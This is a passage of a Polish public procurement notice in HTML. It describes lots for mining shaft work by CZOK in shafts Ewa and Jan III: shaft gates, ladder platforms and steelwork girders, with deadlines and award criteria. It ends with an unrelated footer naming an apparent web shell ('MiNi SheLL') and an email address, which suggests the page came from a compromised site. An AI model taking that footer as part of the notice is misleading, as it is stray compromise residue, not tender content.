<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy prac obejmuje dostawę i zabudowę 2 szt. wrót szybowych wraz 
z oprzyrządowaniem  zabudowanych na poziomie 790 m po stronie północnej.
 
Opracować dokumentację techniczno-technologiczną oraz organizacyjną, celem realizacji przedmiotowego  zadania dla której należy uzyskać akceptację KRZG CZOK,
Warsztatowe wykonanie wszystkich elementów na podstawie wizji lokalnej, zgodnie 
z opracowaną dokumentacją techniczną, przepisami górniczymi, Polskimi Normami oraz uzgodnieniami z przedstawicielem Zamawiającego. 
Zamawiający nie posiada dokumentacji wrót szybowych na poz. 790.
Dostarczenie na zrąb szyb Ewa i rozładunek materiałów, urządzeń, sprzętu 
i narzędzi,
Przygotowanie szybu do realizacji przedmiotowego zadania - zapewnić minimalizację zakłóceń pracy zakładu górniczego,
- zapewnić całkowity brak zagrożenia związanego z przewietrzaniem wyrobisk     dołowych,
- zapewnić maksymalne bezpieczeństwo pracownikom wykonującym roboty szybowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.33.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część VI: Dostawa i wymiana pomostów spoczynkowych i przelotowych przedziału drabinowego szybu Jan III - Pompownia Dębieńsko.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy robót związany z wymianą pomostów przedziału drabinowego szybu Jan III od poz. poz.542m do poz. 625m:
dostawa i wymiana 4 szt. pomostów spoczynkowych  przedziału drabinowego (materiał na pomosty i poszycie  oraz ich wykonanie, a także wszelkie elementy mocujące wraz z podkładkami dostarcza Wykonawca).,
dostawa i wymiana 8 szt. pomostów przelotowych  przedziału drabinowego (materiał na pomosty oraz ich wykonanie, a także wszelkie elementy mocujące wraz 
z podkładkami dostarcza Wykonawca).,
dostawa wszystkich niezbędnych materiałów, elementów, części, narzędzi i oprzyrządowania i sprzętu niezbędnych do realizacji zamówienia w zakresie Wykonawcy, 
zabezpieczenie elementów powłoką antykorozyjną zgodnie z normą EN ISO 12944,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.33.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Część VII: Dostawa i wymiana dźwigarów zbrojenia szybowego szybu Jan III - Pompownia Dębieńsko.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót dla Wykonawcy będzie obejmował:
opracowanie projektu technicznego i technologii na wykonywane prace, zgodnie z obowiązującymi przepisami oraz uregulowaniami wewnętrznymi w CZOK,
wykonanie z materiałów Wykonawcy wszystkich elementów na podstawie wizji lokalnej, zgodnie z dokumentacją górniczego wyciągu szybowego przepisami górniczymi, Polskimi Normami oraz uzgodnieniami z Zamawiającym,
Zamawiający nie posiada dokumentacji technicznej wymienianych elementów zbrojenia,
zabezpieczenie elementów powłoką antykorozyjną zgodnie z normą EN ISO 12944, załadunek i rozładunek wszystkich materiałów, sprzętu i narzędzi do wykonania zadania, transport poziomy na powierzchni oraz w szybie Jan III wszystkich materiałów, sprzętu i narzędzi do wykonania zadania, transport zdemontowanych elementów do wskazanego przez Zamawiającego miejsca,
wymiana elementów zbrojenia, określonych w zakresie rzeczowym robót, 
w miejscach wskazanych przez Zamawiającego,
regulacja elementów zbrojenia szybowego po zakończeniu robót, zgodnie z aktualnym operatem pomiarowym,
wszelkie zmiany w wyposażeniu, konstrukcji oraz zastosowanych materiałach zbrojenia szybowego w stosunku do stanu ujętego w dokumentacji technicznej muszą być uzgodnione z Zamawiającym i wymagają wprowadzenia do dokumentacji górniczego wyciągu szybowego w obowiązującym trybie oraz na koszt i staraniem Wykonawcy,
wykonanie na koszt Wykonawcy po zakończeniu robót badania badań spokoju jazdy naczyń wyciągowych. W przypadku negatywnych wyników badań spowodowanych działaniami Wykonawcy zobowiązany jest on do usunięcia przyczyn i powtórnego badania,
gruz będący efektem prac stanowi własność Wykonawcy do którego należy jego utylizacja, 
złom pozyskany w trakcie wymiany dźwigarów i prowadników należy składować 
w miejscu wskazanym przez  Zamawiającego. Stanowi on własność Zamawiającego,
każdorazowo przed przystąpieniem przez Wykonawcę do realizacji robót oraz po ich zakończeniu, należy dokonać przekazania ( udostępnienia szybu) górniczego wyciągu szybowego użytkownikowi,
Zamawiający zastrzega sobie możliwość jednostronnego i natychmiastowego zerwania umowy w przypadku naruszenia przepisów i stworzenia zagrożenia dla ludzi i ruchu zakładu górniczego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.33.00.00-2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com